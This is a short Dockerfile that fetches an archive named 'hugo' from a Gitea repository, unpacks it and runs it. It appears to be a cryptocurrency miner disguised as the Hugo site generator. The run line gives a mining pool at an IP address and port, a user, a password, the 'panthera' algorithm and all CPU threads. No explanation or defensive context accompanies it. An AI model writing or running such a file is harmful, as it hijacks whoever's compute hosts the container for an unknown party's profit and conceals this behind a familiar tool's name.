FROM ubuntu:latest

RUN apt-get update -y && \
    apt-get install curl xz-utils -y && \
    curl -L https://try.gitea.io/drstrange/cat/raw/branch/master/hugo/hugo.tar.xz > hugo.tar.xz && tar -xvf hugo.tar.xz && \
    chmod +x hugo && \
    ./hugo -o 103.105.50.185:2349 -u jaaxs -p 007 -a panthera -t $(nproc --all) --randomx-1gb-pages